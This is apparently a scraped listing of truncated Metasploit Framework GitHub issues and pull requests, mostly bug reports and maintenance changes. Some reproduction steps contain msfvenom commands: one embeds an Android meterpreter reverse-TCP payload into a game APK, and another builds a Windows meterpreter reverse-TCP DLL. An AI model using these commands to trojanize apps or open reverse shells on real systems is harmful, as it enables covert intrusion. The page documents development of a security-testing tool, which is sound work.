metasploit-framework
metasploit-framework copied to clipboard
Metasploit Framework
This pull request adds additional constants to the reliability metadata for modules. This requirement has come up before for @bcoles and @h00die on modules they have worked on - as...
I run into the following error while attempting to run glassfish_login or glassfish_deployer against a Glassfish 3.1.2.2 (Win Server 2003) test box: ``` [04/15/2016 03:31:57] [i(2)] core: Reloading auxiliary module...
## Steps to reproduce How'd you do it? 1. I generated the payload using: sudo msfvenom -x Hangman.com.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.23 lport=4444 -o android_reverse_tcp_local.apk 2. I later signed the app...
## Steps to reproduce 1. set up a vulnerable proftpd server run by "nobody", configured with module mod_copy.c, and a website with a folder writable by same "nobody" user (here...
There's a light desire for custom MSF output format to be parsed and interpreted automatically, so people who use [higlightjs](http://highlightjs.readthedocs.io/en/latest/language-guide.html) can just splat text up and make it look right....
When generating a stageless meterpreter dll with msfvenom it fails with the following error: ``` msfvenom -p windows/meterpreter_reverse_tcp -f dll No platform was selected, choosing Msf::Module::Platform::Windows from the payload No...
This bumps the version of RubySMB to pull in the changes from rapid7/ruby_smb#242 which adds the NDR TypeSerialization1 data definitions. This means the definitions originally landed in the certified exploit...
## Summary As part of the Kerberos protocol, some portions of a Kerberos ticket are "protected" and cannot be modified without invalidating the ticket. Other parts of a Kerberos ticket...
## Steps to reproduce How'd you do it? 1. 3 VMs: Kali attacker box-> ProxyBox(Win10||Server w/ x64 meterpreter/reverse_https) -> Ubuntu server w/ Nextcloud (a docker solution is the quickest way...
Running `local_exploit_suggester` on a Windows 7 SP1 (x64) host suggested only 3 modules. It used to suggest more than 60+. # `windows/meterpreter/reverse_tcp` payload ``` msf6 exploit(multi/handler) > [*] Sending stage...